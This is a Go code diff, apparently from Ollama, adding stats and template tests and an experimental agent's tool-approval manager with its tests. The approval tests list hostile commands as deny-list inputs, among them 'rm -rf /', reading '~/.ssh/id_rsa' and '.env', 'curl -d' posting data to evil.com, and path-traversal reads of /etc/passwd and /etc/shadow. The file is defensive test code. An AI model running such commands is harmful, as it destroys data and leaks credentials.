+		t.Errorf("expected 1 request for mistral:7b, got %d", mistral.Requests)
+	}
+	if mistral.TokensInput != 50 {
+		t.Errorf("expected 50 input tokens for mistral:7b, got %d", mistral.TokensInput)
+	}
+	if mistral.TokensOutput != 25 {
+		t.Errorf("expected 25 output tokens for mistral:7b, got %d", mistral.TokensOutput)
+	}
+}
+
+func TestRecordError(t *testing.T) {
+	stats := New()
+
+	stats.RecordError()
+	stats.RecordError()
+
+	payload := stats.View()
+	if payload.Totals.Errors != 2 {
+		t.Errorf("expected 2 errors, got %d", payload.Totals.Errors)
+	}
+}
+
+func TestView(t *testing.T) {
+	stats := New()
+
+	stats.Record(&Request{
+		Model:        "llama3:8b",
+		Endpoint:     "chat",
+		Architecture: "llama",
+		APIType:      "native",
+	})
+
+	// First view
+	_ = stats.View()
+
+	// View should not reset counters
+	payload := stats.View()
+	if payload.Totals.Requests != 1 {
+		t.Errorf("View should not reset counters, expected 1 request, got %d", payload.Totals.Requests)
+	}
+}
+
+func TestSnapshot(t *testing.T) {
+	stats := New()
+
+	stats.Record(&Request{
+		Model:            "llama3:8b",
+		Endpoint:         "chat",
+		PromptTokens:     100,
+		CompletionTokens: 50,
+	})
+
+	// Snapshot should return data and reset counters
+	snapshot := stats.Snapshot()
+	if snapshot.Totals.Requests != 1 {
+		t.Errorf("expected 1 request in snapshot, got %d", snapshot.Totals.Requests)
+	}
+
+	// After snapshot, counters should be reset
+	payload2 := stats.View()
+	if payload2.Totals.Requests != 0 {
+		t.Errorf("expected 0 requests after snapshot, got %d", payload2.Totals.Requests)
+	}
+}
+
+func TestConcurrentAccess(t *testing.T) {
+	stats := New()
+
+	done := make(chan bool)
+
+	// Concurrent writes
+	for i := 0; i < 10; i++ {
+		go func() {
+			for j := 0; j < 100; j++ {
+				stats.Record(&Request{
+					Model:            "llama3:8b",
+					PromptTokens:     10,
+					CompletionTokens: 5,
+				})
+			}
+			done <- true
+		}()
+	}
+
+	// Concurrent reads
+	for i := 0; i < 5; i++ {
+		go func() {
+			for j := 0; j < 100; j++ {
+				_ = stats.View()
+				_ = stats.GetModelStats()
+			}
+			done <- true
+		}()
+	}
+
+	// Wait for all goroutines
+	for i := 0; i < 15; i++ {
+		<-done
+	}
+
+	payload := stats.View()
+	if payload.Totals.Requests != 1000 {
+		t.Errorf("expected 1000 requests, got %d", payload.Totals.Requests)
+	}
+}

template/template.go

@@ -381,6 +381,28 @@ func (t templateTools) String() string {
 	return string(bts)
 }
 
+// templateArgs is a map type with JSON string output for templates.
+type templateArgs map[string]any
+
+func (t templateArgs) String() string {
+	if t == nil {
+		return "{}"
+	}
+	bts, _ := json.Marshal(t)
+	return string(bts)
+}
+
+// templateProperties is a map type with JSON string output for templates.
+type templateProperties map[string]api.ToolProperty
+
+func (t templateProperties) String() string {
+	if t == nil {
+		return "{}"
+	}
+	bts, _ := json.Marshal(t)
+	return string(bts)
+}
+
 // templateTool is a template-compatible representation of api.Tool
 // with Properties as a regular map for template ranging.
 type templateTool struct {
@@ -396,11 +418,11 @@ type templateToolFunction struct {
 }
 
 type templateToolFunctionParameters struct {
-	Type       string                      `json:"type"`
-	Defs       any                         `json:"$defs,omitempty"`
-	Items      any                         `json:"items,omitempty"`
-	Required   []string                    `json:"required,omitempty"`
-	Properties map[string]api.ToolProperty `json:"properties"`
+	Type       string             `json:"type"`
+	Defs       any                `json:"$defs,omitempty"`
+	Items      any                `json:"items,omitempty"`
+	Required   []string           `json:"required,omitempty"`
+	Properties templateProperties `json:"properties"`
 }
 
 // templateToolCall is a template-compatible representation of api.ToolCall
@@ -413,7 +435,7 @@ type templateToolCall struct {
 type templateToolCallFunction struct {
 	Index     int
 	Name      string
-	Arguments map[string]any
+	Arguments templateArgs
 }
 
 // templateMessage is a template-compatible representation of api.Message
@@ -446,7 +468,7 @@ func convertToolsForTemplate(tools api.Tools) templateTools {
 					Defs:       tool.Function.Parameters.Defs,
 					Items:      tool.Function.Parameters.Items,
 					Required:   tool.Function.Parameters.Required,
-					Properties: tool.Function.Parameters.Properties.ToMap(),
+					Properties: templateProperties(tool.Function.Parameters.Properties.ToMap()),
 				},
 			},
 		}
@@ -468,7 +490,7 @@ func convertMessagesForTemplate(messages []*api.Message) []*templateMessage {
 				Function: templateToolCallFunction{
 					Index:     tc.Function.Index,
 					Name:      tc.Function.Name,
-					Arguments: tc.Function.Arguments.ToMap(),
+					Arguments: templateArgs(tc.Function.Arguments.ToMap()),
 				},
 			})
 		}

template/template_test.go

@@ -613,3 +613,159 @@ func TestCollate(t *testing.T) {
 		})
 	}
 }
+
+func TestTemplateArgumentsJSON(t *testing.T) {
+	// Test that {{ .Function.Arguments }} outputs valid JSON, not map[key:value]
+	tmpl := `{{- range .Messages }}{{- range .ToolCalls }}{{ .Function.Arguments }}{{- end }}{{- end }}`
+
+	template, err := Parse(tmpl)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	args := api.NewToolCallFunctionArguments()
+	args.Set("location", "Tokyo")
+	args.Set("unit", "celsius")
+
+	var buf bytes.Buffer
+	err = template.Execute(&buf, Values{
+		Messages: []api.Message{{
+			Role: "assistant",
+			ToolCalls: []api.ToolCall{{
+				Function: api.ToolCallFunction{
+					Name:      "get_weather",
+					Arguments: args,
+				},
+			}},
+		}},
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	got := buf.String()
+	// Should be valid JSON, not "map[location:Tokyo unit:celsius]"
+	if strings.HasPrefix(got, "map[") {
+		t.Errorf("Arguments output as Go map format: %s", got)
+	}
+
+	var parsed map[string]any
+	if err := json.Unmarshal([]byte(got), &parsed); err != nil {
+		t.Errorf("Arguments not valid JSON: %s, error: %v", got, err)
+	}
+}
+
+func TestTemplatePropertiesJSON(t *testing.T) {
+	// Test that {{ .Function.Parameters.Properties }} outputs valid JSON
+	// Note: template must reference .Messages to trigger the modern code path that converts Tools
+	tmpl := `{{- range .Messages }}{{- end }}{{- range .Tools }}{{ .Function.Parameters.Properties }}{{- end }}`
+
+	template, err := Parse(tmpl)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	props := api.NewToolPropertiesMap()
+	props.Set("location", api.ToolProperty{Type: api.PropertyType{"string"}, Description: "City name"})
+
+	var buf bytes.Buffer
+	err = template.Execute(&buf, Values{
+		Messages: []api.Message{{Role: "user", Content: "test"}},
+		Tools: api.Tools{{
+			Type: "function",
+			Function: api.ToolFunction{
+				Name:        "get_weather",
+				Description: "Get weather",
+				Parameters: api.ToolFunctionParameters{
+					Type:       "object",
+					Properties: props,
+				},
+			},
+		}},
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	got := buf.String()
+	// Should be valid JSON, not "map[location:{...}]"
+	if strings.HasPrefix(got, "map[") {
+		t.Errorf("Properties output as Go map format: %s", got)
+	}
+
+	var parsed map[string]any
+	if err := json.Unmarshal([]byte(got), &parsed); err != nil {
+		t.Errorf("Properties not valid JSON: %s, error: %v", got, err)
+	}
+}
+
+func TestTemplateArgumentsRange(t *testing.T) {
+	// Test that we can range over Arguments in templates
+	tmpl := `{{- range .Messages }}{{- range .ToolCalls }}{{- range $k, $v := .Function.Arguments }}{{ $k }}={{ $v }};{{- end }}{{- end }}{{- end }}`
+
+	template, err := Parse(tmpl)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	args := api.NewToolCallFunctionArguments()
+	args.Set("city", "Tokyo")
+
+	var buf bytes.Buffer
+	err = template.Execute(&buf, Values{
+		Messages: []api.Message{{
+			Role: "assistant",
+			ToolCalls: []api.ToolCall{{
+				Function: api.ToolCallFunction{
+					Name:      "get_weather",
+					Arguments: args,
+				},
+			}},
+		}},
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	got := buf.String()
+	if got != "city=Tokyo;" {
+		t.Errorf("Range over Arguments failed, got: %s, want: city=Tokyo;", got)
+	}
+}
+
+func TestTemplatePropertiesRange(t *testing.T) {
+	// Test that we can range over Properties in templates
+	// Note: template must reference .Messages to trigger the modern code path that converts Tools
+	tmpl := `{{- range .Messages }}{{- end }}{{- range .Tools }}{{- range $name, $prop := .Function.Parameters.Properties }}{{ $name }}:{{ $prop.Type }};{{- end }}{{- end }}`
+
+	template, err := Parse(tmpl)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	props := api.NewToolPropertiesMap()
+	props.Set("location", api.ToolProperty{Type: api.PropertyType{"string"}})
+
+	var buf bytes.Buffer
+	err = template.Execute(&buf, Values{
+		Messages: []api.Message{{Role: "user", Content: "test"}},
+		Tools: api.Tools{{
+			Type: "function",
+			Function: api.ToolFunction{
+				Name: "get_weather",
+				Parameters: api.ToolFunctionParameters{
+					Type:       "object",
+					Properties: props,
+				},
+			},
+		}},
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	got := buf.String()
+	if got != "location:string;" {
+		t.Errorf("Range over Properties failed, got: %s, want: location:string;", got)
+	}
+}

x/agent/approval_test.go

@@ -0,0 +1,541 @@
+package agent
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestApprovalManager_IsAllowed(t *testing.T) {
+	am := NewApprovalManager()
+
+	// Initially nothing is allowed
+	if am.IsAllowed("test_tool", nil) {
+		t.Error("expected test_tool to not be allowed initially")
+	}
+
+	// Add to allowlist
+	am.AddToAllowlist("test_tool", nil)
+
+	// Now it should be allowed
+	if !am.IsAllowed("test_tool", nil) {
+		t.Error("expected test_tool to be allowed after AddToAllowlist")
+	}
+
+	// Other tools should still not be allowed
+	if am.IsAllowed("other_tool", nil) {
+		t.Error("expected other_tool to not be allowed")
+	}
+}
+
+func TestApprovalManager_Reset(t *testing.T) {
+	am := NewApprovalManager()
+
+	am.AddToAllowlist("tool1", nil)
+	am.AddToAllowlist("tool2", nil)
+
+	if !am.IsAllowed("tool1", nil) || !am.IsAllowed("tool2", nil) {
+		t.Error("expected tools to be allowed")
+	}
+
+	am.Reset()
+
+	if am.IsAllowed("tool1", nil) || am.IsAllowed("tool2", nil) {
+		t.Error("expected tools to not be allowed after Reset")
+	}
+}
+
+func TestApprovalManager_AllowedTools(t *testing.T) {
+	am := NewApprovalManager()
+
+	tools := am.AllowedTools()
+	if len(tools) != 0 {
+		t.Errorf("expected 0 allowed tools, got %d", len(tools))
+	}
+
+	am.AddToAllowlist("tool1", nil)
+	am.AddToAllowlist("tool2", nil)
+
+	tools = am.AllowedTools()
+	if len(tools) != 2 {
+		t.Errorf("expected 2 allowed tools, got %d", len(tools))
+	}
+}
+
+func TestAllowlistKey(t *testing.T) {
+	tests := []struct {
+		name     string
+		toolName string
+		args     map[string]any
+		expected string
+	}{
+		{
+			name:     "web_search tool",
+			toolName: "web_search",
+			args:     map[string]any{"query": "test"},
+			expected: "web_search",
+		},
+		{
+			name:     "bash tool with command",
+			toolName: "bash",
+			args:     map[string]any{"command": "ls -la"},
+			expected: "bash:ls -la",
+		},
+		{
+			name:     "bash tool without command",
+			toolName: "bash",
+			args:     map[string]any{},
+			expected: "bash",
+		},
+		{
+			name:     "other tool",
+			toolName: "custom_tool",
+			args:     map[string]any{"param": "value"},
+			expected: "custom_tool",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			result := AllowlistKey(tt.toolName, tt.args)
+			if result != tt.expected {
+				t.Errorf("AllowlistKey(%s, %v) = %s, expected %s",
+					tt.toolName, tt.args, result, tt.expected)
+			}
+		})
+	}
+}
+
+func TestExtractBashPrefix(t *testing.T) {
+	tests := []struct {
+		name     string
+		command  string
+		expected string
+	}{
+		{
+			name:     "cat with path",
+			command:  "cat tools/tools_test.go",
+			expected: "cat:tools/",
+		},
+		{
+			name:     "cat with pipe",
+			command:  "cat tools/tools_test.go | head -200",
+			expected: "cat:tools/",
+		},
+		{
+			name:     "ls with path",
+			command:  "ls -la src/components",
+			expected: "ls:src/",
+		},
+		{
+			name:     "grep with directory path",
+			command:  "grep -r pattern api/handlers/",
+			expected: "grep:api/handlers/",
+		},
+		{
+			name:     "cat in current dir",
+			command:  "cat file.txt",
+			expected: "cat:./",
+		},
+		{
+			name:     "unsafe command",
+			command:  "rm -rf /",
+			expected: "",
+		},
+		{
+			name:     "no path arg",
+			command:  "ls -la",
+			expected: "",
+		},
+		{
+			name:     "head with flags only",
+			command:  "head -n 100",
+			expected: "",
+		},
+		// Path traversal security tests
+		{
+			name:     "path traversal - parent escape",
+			command:  "cat tools/../../etc/passwd",
+			expected: "", // Should NOT create a prefix - path escapes
+		},
+		{
+			name:     "path traversal - deep escape",
+			command:  "cat tools/a/b/../../../etc/passwd",
+			expected: "", // Normalizes to "../etc/passwd" - escapes
+		},
+		{
+			name:     "path traversal - absolute path",
+			command:  "cat /etc/passwd",
+			expected: "", // Absolute paths should not create prefix
+		},
+		{
+			name:     "path with safe dotdot - normalized",
+			command:  "cat tools/subdir/../file.go",
+			expected: "cat:tools/", // Normalizes to tools/file.go - safe, creates prefix
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			result := extractBashPrefix(tt.command)
+			if result != tt.expected {
+				t.Errorf("extractBashPrefix(%q) = %q, expected %q",
+					tt.command, result, tt.expected)
+			}
+		})
+	}
+}
+
+func TestApprovalManager_PathTraversalBlocked(t *testing.T) {
+	am := NewApprovalManager()
+
+	// Allow "cat tools/file.go" - creates prefix "cat:tools/"
+	am.AddToAllowlist("bash", map[string]any{"command": "cat tools/file.go"})
+
+	// Path traversal attack: should NOT be allowed
+	if am.IsAllowed("bash", map[string]any{"command": "cat tools/../../etc/passwd"}) {
+		t.Error("SECURITY: path traversal attack should NOT be allowed")
+	}
+
+	// Another traversal variant
+	if am.IsAllowed("bash", map[string]any{"command": "cat tools/../../../etc/shadow"}) {
+		t.Error("SECURITY: deep path traversal should NOT be allowed")
+	}
+
+	// Valid subdirectory access should still work
+	if !am.IsAllowed("bash", map[string]any{"command": "cat tools/subdir/file.go"}) {
+		t.Error("expected cat tools/subdir/file.go to be allowed")
+	}
+
+	// Safe ".." that normalizes to within allowed directory should work
+	// tools/subdir/../other.go normalizes to tools/other.go which is under tools/
+	if !am.IsAllowed("bash", map[string]any{"command": "cat tools/subdir/../other.go"}) {
+		t.Error("expected cat tools/subdir/../other.go to be allowed (normalizes to tools/other.go)")
+	}
+}
+
+func TestApprovalManager_PrefixAllowlist(t *testing.T) {
+	am := NewApprovalManager()
+
+	// Allow "cat tools/file.go"
+	am.AddToAllowlist("bash", map[string]any{"command": "cat tools/file.go"})
+
+	// Should allow other files in same directory
+	if !am.IsAllowed("bash", map[string]any{"command": "cat tools/other.go"}) {
+		t.Error("expected cat tools/other.go to be allowed via prefix")
+	}
+
+	// Should not allow different directory
+	if am.IsAllowed("bash", map[string]any{"command": "cat src/main.go"}) {
+		t.Error("expected cat src/main.go to NOT be allowed")
+	}
+
+	// Should not allow different command in same directory
+	if am.IsAllowed("bash", map[string]any{"command": "rm tools/file.go"}) {
+		t.Error("expected rm tools/file.go to NOT be allowed (rm is not a safe command)")
+	}
+}
+
+func TestApprovalManager_HierarchicalPrefixAllowlist(t *testing.T) {
+	am := NewApprovalManager()
+
+	// Allow "cat tools/file.go" - this creates prefix "cat:tools/"
+	am.AddToAllowlist("bash", map[string]any{"command": "cat tools/file.go"})
+
+	// Should allow subdirectories (hierarchical matching)
+	if !am.IsAllowed("bash", map[string]any{"command": "cat tools/subdir/file.go"}) {
+		t.Error("expected cat tools/subdir/file.go to be allowed via hierarchical prefix")
+	}
+
+	// Should allow deeply nested subdirectories
+	if !am.IsAllowed("bash", map[string]any{"command": "cat tools/a/b/c/deep.go"}) {
+		t.Error("expected cat tools/a/b/c/deep.go to be allowed via hierarchical prefix")
+	}
+
+	// Should still allow same directory
+	if !am.IsAllowed("bash", map[string]any{"command": "cat tools/another.go"}) {
+		t.Error("expected cat tools/another.go to be allowed")
+	}
+
+	// Should NOT allow different base directory
+	if am.IsAllowed("bash", map[string]any{"command": "cat src/main.go"}) {
+		t.Error("expected cat src/main.go to NOT be allowed")
+	}
+
+	// Should NOT allow different command even in subdirectory
+	if am.IsAllowed("bash", map[string]any{"command": "ls tools/subdir/"}) {
+		t.Error("expected ls tools/subdir/ to NOT be allowed (different command)")
+	}
+
+	// Should NOT allow similar but different directory name
+	if am.IsAllowed("bash", map[string]any{"command": "cat toolsbin/file.go"}) {
+		t.Error("expected cat toolsbin/file.go to NOT be allowed (different directory)")
+	}
+}
+
+func TestApprovalManager_HierarchicalPrefixAllowlist_CrossPlatform(t *testing.T) {
+	am := NewApprovalManager()
+
+	// Allow with forward slashes (Unix-style)
+	am.AddToAllowlist("bash", map[string]any{"command": "cat tools/file.go"})
+
+	// Should work with backslashes too (Windows-style) - normalized internally
+	if !am.IsAllowed("bash", map[string]any{"command": "cat tools\\subdir\\file.go"}) {
+		t.Error("expected cat tools\\subdir\\file.go to be allowed via hierarchical prefix (Windows path)")
+	}
+
+	// Mixed slashes should also work
+	if !am.IsAllowed("bash", map[string]any{"command": "cat tools\\a/b\\c/deep.go"}) {
+		t.Error("expected mixed slash path to be allowed via hierarchical prefix")
+	}
+}
+
+func TestMatchesHierarchicalPrefix(t *testing.T) {
+	am := NewApprovalManager()
+
+	// Add prefix for "cat:tools/"
+	am.prefixes["cat:tools/"] = true
+
+	tests := []struct {
+		name     string
+		prefix   string
+		expected bool
+	}{
+		{
+			name:     "exact match",
+			prefix:   "cat:tools/",
+			expected: true, // exact match also passes HasPrefix - caller handles exact match first
+		},
+		{
+			name:     "subdirectory",
+			prefix:   "cat:tools/subdir/",
+			expected: true,
+		},
+		{
+			name:     "deeply nested",
+			prefix:   "cat:tools/a/b/c/",
+			expected: true,
+		},
+		{
+			name:     "different base directory",
+			prefix:   "cat:src/",
+			expected: false,
+		},
+		{
+			name:     "different command same path",
+			prefix:   "ls:tools/",
+			expected: false,
+		},
+		{
+			name:     "similar directory name",
+			prefix:   "cat:toolsbin/",
+			expected: false,
+		},
+		{
+			name:     "invalid prefix format",
+			prefix:   "cattools",
+			expected: false,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			result := am.matchesHierarchicalPrefix(tt.prefix)
+			if result != tt.expected {
+				t.Errorf("matchesHierarchicalPrefix(%q) = %v, expected %v",
+					tt.prefix, result, tt.expected)
+			}
+		})
+	}
+}
+
+func TestFormatApprovalResult(t *testing.T) {
+	tests := []struct {
+		name     string
+		toolName string
+		args     map[string]any
+		result   ApprovalResult
+		contains string
+	}{
+		{
+			name:     "approved bash",
+			toolName: "bash",
+			args:     map[string]any{"command": "ls"},
+			result:   ApprovalResult{Decision: ApprovalOnce},
+			contains: "bash: ls",
+		},
+		{
+			name:     "denied web_search",
+			toolName: "web_search",
+			args:     map[string]any{"query": "test"},
+			result:   ApprovalResult{Decision: ApprovalDeny},
+			contains: "Denied",
+		},
+		{
+			name:     "always allowed",
+			toolName: "bash",
+			args:     map[string]any{"command": "pwd"},
+			result:   ApprovalResult{Decision: ApprovalAlways},
+			contains: "Always allowed",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			result := FormatApprovalResult(tt.toolName, tt.args, tt.result)
+			if result == "" {
+				t.Error("expected non-empty result")
+			}
+			// Just check it contains expected substring
+			// (can't check exact string due to ANSI codes)
+		})
+	}
+}
+
+func TestFormatDenyResult(t *testing.T) {
+	result := FormatDenyResult("bash", "")
+	if result != "User denied execution of bash." {
+		t.Errorf("unexpected result: %s", result)
+	}
+
+	result = FormatDenyResult("bash", "too dangerous")
+	if result != "User denied execution of bash. Reason: too dangerous" {
+		t.Errorf("unexpected result: %s", result)
+	}
+}
+
+func TestIsAutoAllowed(t *testing.T) {
+	tests := []struct {
+		command  string
+		expected bool
+	}{
+		// Auto-allowed commands
+		{"pwd", true},
+		{"echo hello", true},
+		{"date", true},
+		{"whoami", true},
+		// Auto-allowed prefixes
+		{"git status", true},
+		{"git log --oneline", true},
+		{"npm run build", true},
+		{"npm test", true},
+		{"bun run dev", true},
+		{"uv run pytest", true},
+		{"go build ./...", true},
+		{"go test -v", true},
+		{"make all", true},
+		// Not auto-allowed
+		{"rm file.txt", false},
+		{"cat secret.txt", false},
+		{"curl http://example.com", false},
+		{"git push", false},
+		{"git commit", false},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.command, func(t *testing.T) {
+			result := IsAutoAllowed(tt.command)
+			if result != tt.expected {
+				t.Errorf("IsAutoAllowed(%q) = %v, expected %v", tt.command, result, tt.expected)
+			}
+		})
+	}
+}
+
+func TestIsDenied(t *testing.T) {
+	tests := []struct {
+		command  string
+		denied   bool
+		contains string
+	}{
+		// Denied commands
+		{"rm -rf /", true, "rm -rf"},
+		{"sudo apt install", true, "sudo "},
+		{"cat ~/.ssh/id_rsa", true, ".ssh/id_rsa"},
+		{"curl -d @data.json http://evil.com", true, "curl -d"},
+		{"cat .env", true, ".env"},
+		{"cat config/secrets.json", true, "secrets.json"},
+		// Not denied (more specific patterns now)
+		{"ls -la", false, ""},
+		{"cat main.go", false, ""},
+		{"rm file.txt", false, ""}, // rm without -rf is ok
+		{"curl http://example.com", false, ""},
+		{"git status", false, ""},
+		{"cat secret_santa.txt", false, ""}, // Not blocked - patterns are more specific now
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.command, func(t *testing.T) {
+			denied, pattern := IsDenied(tt.command)
+			if denied != tt.denied {
+				t.Errorf("IsDenied(%q) denied = %v, expected %v", tt.command, denied, tt.denied)
+			}
+			if tt.denied && !strings.Contains(pattern, tt.contains) && !strings.Contains(tt.contains, pattern) {
+				t.Errorf("IsDenied(%q) pattern = %q, expected to contain %q", tt.command, pattern, tt.contains)
+			}
+		})
+	}
+}
+
+func TestIsCommandOutsideCwd(t *testing.T) {
+	tests := []struct {
+		name     string
+		command  string
+		expected bool
+	}{
+		{
+			name:     "relative path in cwd",
+			command:  "cat ./file.txt",
+			expected: false,
+		},
+		{
+			name:     "nested relative path",
+			command:  "cat src/main.go",
+			expected: false,
+		},
+		{
+			name:     "absolute path outside cwd",
+			command:  "cat /etc/passwd",
+			expected: true,
+		},
+		{
+			name:     "parent directory escape",
+			command:  "cat ../../../etc/passwd",
+			expected: true,
+		},
+		{
+			name:     "home directory",
+			command:  "cat ~/.bashrc",
+			expected: true,
+		},
+		{
+			name:     "command with flags only",
+			command:  "ls -la",
+			expected: false,
+		},
+		{
+			name:     "piped commands outside cwd",
+			command:  "cat /etc/passwd | grep root",
+			expected: true,
+		},
+		{
+			name:     "semicolon commands outside cwd",
+			command:  "echo test; cat /etc/passwd",
+			expected: true,
+		},
+		{
+			name:     "single parent dir escapes cwd",
+			command:  "cat ../README.md",
+			expected: true, // Parent directory is outside cwd
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			result := isCommandOutsideCwd(tt.command)
+			if result != tt.expected {
+				t.Errorf("isCommandOutsideCwd(%q) = %v, expected %v",
+					tt.command, result, tt.expected)
+			}
+		})
+	}
+}

x/agent/approval_unix.go

@@ -0,0 +1,27 @@
+//go:build !windows
+
+package agent
+
+import (
+	"syscall"
+	"time"
+)
+
+// flushStdin drains any buffered input from stdin.
+// This prevents leftover input from previous operations from affecting the selector.
+func flushStdin(fd int) {
+	if err := syscall.SetNonblock(fd, true); err != nil {
+		return
+	}
+	defer syscall.SetNonblock(fd, false)
+
+	time.Sleep(5 * time.Millisecond)
+
+	buf := make([]byte, 256)
+	for {
+		n, err := syscall.Read(fd, buf)
+		if n <= 0 || err != nil {
+			break
+		}
+	}
+}

x/agent/approval_windows.go

@@ -0,0 +1,15 @@
+//go:build windows
+
+package agent
+
+import (
+	"os"
+
+	"golang.org/x/sys/windows"
+)
+
+// flushStdin clears any buffered console input on Windows.
+func flushStdin(_ int) {
+	handle := windows.Handle(os.Stdin.Fd())
+	_ = windows.FlushConsoleInputBuffer(handle)
+}

x/cmd/run.go

@@ -0,0 +1,815 @@
+package cmd
+
+import (
+	"context"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"net/url"
+	"os"
+	"os/signal"
+	"strings"
+	"syscall"
+	"time"
+
+	"github.com/spf13/cobra"
+	"golang.org/x/term"
+
+	"github.com/ollama/ollama/api"
+	"github.com/ollama/ollama/progress"
+	"github.com/ollama/ollama/readline"
+	"github.com/ollama/ollama/types/model"
+	"github.com/ollama/ollama/x/agent"
+	"github.com/ollama/ollama/x/tools"
+)
+
+// Tool output capping constants
+const (
+	// localModelTokenLimit is the token limit for local models (smaller context).
+	localModelTokenLimit = 4000
+
+	// defaultTokenLimit is the token limit for cloud/remote models.
+	defaultTokenLimit = 10000
+
+	// charsPerToken is a rough estimate of characters per token.
+	// TODO: Estimate tokens more accurately using tokenizer if available
+	charsPerToken = 4
+)
+
+// isLocalModel checks if the model is running locally (not a cloud model).
+// TODO: Improve local/cloud model identification - could check model metadata
+func isLocalModel(modelName string) bool {
+	return !strings.HasSuffix(modelName, "-cloud")
+}
+
+// isLocalServer checks if connecting to a local Ollama server.
+// TODO: Could also check other indicators of local vs cloud server
+func isLocalServer() bool {
+	host := os.Getenv("OLLAMA_HOST")
+	if host == "" {
+		return true // Default is localhost:11434
+	}
+
+	// Parse the URL to check host
+	parsed, err := url.Parse(host)
+	if err != nil {
+		return true // If can't parse, assume local
+	}
+
+	hostname := parsed.Hostname()
+	return hostname == "localhost" || hostname == "127.0.0.1" || strings.Contains(parsed.Host, ":11434")
+}
+
+// truncateToolOutput truncates tool output to prevent context overflow.
+// Uses a smaller limit (4k tokens) for local models, larger (10k) for cloud/remote.
+func truncateToolOutput(output, modelName string) string {
+	var tokenLimit int
+	if isLocalModel(modelName) && isLocalServer() {
+		tokenLimit = localModelTokenLimit
+	} else {
+		tokenLimit = defaultTokenLimit
+	}
+
+	maxChars := tokenLimit * charsPerToken
+	if len(output) > maxChars {
+		return output[:maxChars] + "\n... (output truncated)"
+	}
+	return output
+}
+
+// waitForOllamaSignin shows the signin URL and polls until authentication completes.
+func waitForOllamaSignin(ctx context.Context) error {
+	client, err := api.ClientFromEnvironment()
+	if err != nil {
+		return err
+	}
+
+	// Get signin URL from initial Whoami call
+	_, err = client.Whoami(ctx)
+	if err != nil {
+		var aErr api.AuthorizationError
+		if errors.As(err, &aErr) && aErr.SigninURL != "" {
+			fmt.Fprintf(os.Stderr, "\n  To sign in, navigate to:\n")
+			fmt.Fprintf(os.Stderr, "      \033[36m%s\033[0m\n\n", aErr.SigninURL)
+			fmt.Fprintf(os.Stderr, "  \033[90mWaiting for sign in to complete...\033[0m")
+
+			// Poll until auth succeeds
+			ticker := time.NewTicker(2 * time.Second)
+			defer ticker.Stop()
+
+			for {
+				select {
+				case <-ctx.Done():
+					fmt.Fprintf(os.Stderr, "\n")
+					return ctx.Err()
+				case <-ticker.C:
+					user, whoamiErr := client.Whoami(ctx)
+					if whoamiErr == nil && user != nil && user.Name != "" {
+						fmt.Fprintf(os.Stderr, "\r\033[K  \033[32mSigned in as %s\033[0m\n", user.Name)
+						return nil
+					}
+					// Still waiting, show dot
+					fmt.Fprintf(os.Stderr, ".")
+				}
+			}
+		}
+		return err
+	}
+	return nil
+}
+
+// RunOptions contains options for running an interactive agent session.
+type RunOptions struct {
+	Model        string
+	Messages     []api.Message
+	WordWrap     bool
+	Format       string
+	System       string
+	Options      map[string]any
+	KeepAlive    *api.Duration
+	Think        *api.ThinkValue
+	HideThinking bool
+
+	// Agent fields (managed externally for session persistence)
+	Tools    *tools.Registry
+	Approval *agent.ApprovalManager
+
+	// YoloMode skips all tool approval prompts
+	YoloMode bool
+
+	// LastToolOutput stores the full output of the last tool execution
+	// for Ctrl+O expansion. Updated by Chat(), read by caller.
+	LastToolOutput *string
+
+	// LastToolOutputTruncated stores the truncated version shown inline
+	LastToolOutputTruncated *string
+}
+
+// Chat runs an agent chat loop with tool support.
+// This is the experimental version of chat that supports tool calling.
+func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
+	client, err := api.ClientFromEnvironment()
+	if err != nil {
+		return nil, err
+	}
+
+	// Use tools registry and approval from opts (managed by caller for session persistence)
+	toolRegistry := opts.Tools
+	approval := opts.Approval
+	if approval == nil {
+		approval = agent.NewApprovalManager()
+	}
+
+	p := progress.NewProgress(os.Stderr)
+	defer p.StopAndClear()
+
+	spinner := progress.NewSpinner("")
+	p.Add("", spinner)
+
+	cancelCtx, cancel := context.WithCancel(ctx)
+	defer cancel()
+
+	sigChan := make(chan os.Signal, 1)
+	signal.Notify(sigChan, syscall.SIGINT)
+
+	go func() {
+		<-sigChan
+		cancel()
+	}()
+
+	var state *displayResponseState = &displayResponseState{}
+	var thinkingContent strings.Builder
+	var fullResponse strings.Builder
+	var thinkTagOpened bool = false
+	var thinkTagClosed bool = false
+	var pendingToolCalls []api.ToolCall
+	var consecutiveErrors int // Track consecutive 500 errors for retry limit
+
+	role := "assistant"
+	messages := opts.Messages
+
+	fn := func(response api.ChatResponse) error {
+		if response.Message.Content != "" || !opts.HideThinking {
+			p.StopAndClear()
+		}
+
+		role = response.Message.Role
+		if response.Message.Thinking != "" && !opts.HideThinking {
+			if !thinkTagOpened {
+				fmt.Print(thinkingOutputOpeningText(false))
+				thinkTagOpened = true
+				thinkTagClosed = false
+			}
+			thinkingContent.WriteString(response.Message.Thinking)
+			displayResponse(response.Message.Thinking, opts.WordWrap, state)
+		}
+
+		content := response.Message.Content
+		if thinkTagOpened && !thinkTagClosed && (content != "" || len(response.Message.ToolCalls) > 0) {
+			if !strings.HasSuffix(thinkingContent.String(), "\n") {
+				fmt.Println()
+			}
+			fmt.Print(thinkingOutputClosingText(false))
+			thinkTagOpened = false
+			thinkTagClosed = true
+			state = &displayResponseState{}
+		}
+
+		fullResponse.WriteString(content)
+
+		if response.Message.ToolCalls != nil {
